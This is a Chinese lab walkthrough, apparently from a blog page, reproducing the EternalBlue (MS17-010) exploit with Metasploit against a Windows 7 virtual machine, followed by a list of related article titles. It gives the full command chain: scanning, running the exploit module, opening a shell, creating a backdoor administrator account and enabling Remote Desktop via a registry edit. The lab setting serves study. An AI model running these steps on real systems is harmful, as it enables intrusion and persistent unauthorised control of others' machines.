复现环境:

1.攻击机:kali2022(192.168.1.50)

2.靶机:win7 enterprise(192.168.1.55)

关闭靶机win7防火墙

两台虚拟机已经互相ping通

1.探测我们要攻击的靶机

登录kali,用nmap探测本网段存活的主机:namp 192.168.1.0/24

可以看到我们靶机的445端口是开放状态的

2.使用msf永恒之蓝模块

输入:msfconsole打开MSF

搜索ms17_010代码:search ms17_010

0号1号是攻击模块,3号是扫描模块,先扫描如果有漏洞,再进行攻击。

3.使用ms17_010扫描模块对靶机进行扫描:use auxiliary/scanner/smb/smb_ms17_010

设置目标ip或网段:set rhosts 192.168.1.55

执行扫描:run

如图,说明漏洞存在

4.使用ms17_010攻击模块对靶机进行攻击:use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标ip:set rhosts 192.168.1.55

执行攻击:exploit 或 run

攻击成功

5.获取靶机shell:shell

解决乱码问题:chcp 65001

6.通过shell对靶机进行控制:

1、创建新用户:net user 1 123456 、add

因为我已经创建过一次了,直接看下面步骤

2、将用户1添加至管理员:net localgroup administrators 1 /add

3、开启远程桌面:

首先查看开启的端口:netstat -ano

发现3389端口并没有开启,使用命令开启:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

到这里, 我们发现3389端口已经开启了

4、远程桌面连接靶机:另起一个终端输入命令:rdesktop 192.168.1.55

成功!感谢观看!

永恒之蓝ms17_010漏洞相关推荐

  1. 永恒之蓝ms17_010漏洞利用攻击

    文章目录 前言 一:基础知识介绍 二.实验环境 三.实验步骤 总结 前言 学习Metasploit的时候就听说了经典的永恒之蓝漏洞,所以自己试验了一次,借此作个记录. 一:基础知识介绍 1.何为永恒之 ...

  2. 永恒之蓝 ms17_010漏洞

    复现环境: 攻击机:Linux kali(192.168.119.128) 靶机:Windows 7 x64(192.168.119.129) 实验条件:两台机子可以相互ping通,并且靶机(无补丁) ...

  3. 永恒之蓝ms17_010漏洞复现

    1.复现准备 攻击机:Linux kali(IP:192.168.52.132) 靶机:Windows 7(x64)(IP:192.168.52.130) 条件:靶机防火墙关闭,两台机子能够相互pin ...

  4. 永恒之蓝勒索漏洞复现

    下载2017没下补丁前的window7版本 然后先查看本机ip 192.168.140.130 先找一下我们目前局域网存在的可能被我们攻击的主机. 首先使用 nmap 命令扫描局域网内的所有主机(因为 ...

  5. 永恒之蓝ms17-010漏洞利用复现

    一.永恒之蓝简述: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝&q ...

  6. kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

    kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...

  7. 永恒之蓝 MS17-010漏洞复现

    永恒之蓝 MS17-010漏洞复现 文章目录 永恒之蓝 MS17-010漏洞复现 一:漏洞原理 1:简介 2:漏洞原理代码详解 二:漏洞复现 1:信息收集 2:尝试攻击 1>:查看漏洞模块--s ...

  8. metasploit实战-ms17-010(永恒之蓝)漏洞利用与复现

    本文目录 永恒之蓝概述 实验环境 实验过程 第一步:扫描漏洞 第二步:渗透攻击 第三步:漏洞利用 截屏 永恒之蓝概述 ms17-010(永恒之蓝)漏洞是由Shadow Brokers(影子经纪人)在2 ...

  9. MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

    MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝 ...

最新文章

  1. hadoop问题小结
  2. C++——友元 friend
  3. 新鲜新奇事物_对各样新奇事物都有兴趣去了解的星座
  4. Java中可变长参数的使用及注意事项
  5. Huffman(哈夫曼)编码--又称最佳编码(最有效的二进制编码)
  6. Java服务CPU飙到99%问题排查
  7. [深度学习] tensorflow1.x和tensorflow2.x对比与总结
  8. 迁移学习-使用预训练的Inception v3进行宠物分类
  9. 一款开源Office软件---Lotus Symphony在Linux系统下的应用
  10. ZigBee cc2530芯片学习 error记录(1)
  11. php集成paypal接口,PayPal接口集成之:PHP集成PayPal标准支付接口
  12. 学信号处理要理解均值、平均偏差、标准差、方差
  13. JavaScript ,js基础
  14. 查看已激活Windows的密钥
  15. 计算机科学的拉丁文,拉丁字母A-Z在计算机中对应的二进制编码
  16. 性能测试流程指南和工具推荐
  17. 【Python 笔记】Linux 下源码编译安装 python
  18. u盘插linux电脑不好使,u盘插电脑没反应怎么办的几种真正解决方式
  19. 2018年上半年信息安全工程师上午选择题及解析
  20. react之router

热门文章

  1. ❤️React Hooks⭐
  2. OpenCV开发笔记(七十二):红胖子8分钟带你使用opencv+dnn+tensorFlow识别物体
  3. IOS input 光标大小调整
  4. Pta——敲笨钟,制定位置输出字符串
  5. ML-czy的小组任务
  6. QGIS制作精美地图
  7. C++面试进阶之咖啡罐问题
  8. SuperMap for MapboxGL 实现自定义图标点位及多点位聚合
  9. 从键盘输入一个数,判断是否为质数
  10. 软考题目之头结点、头指针和首元节点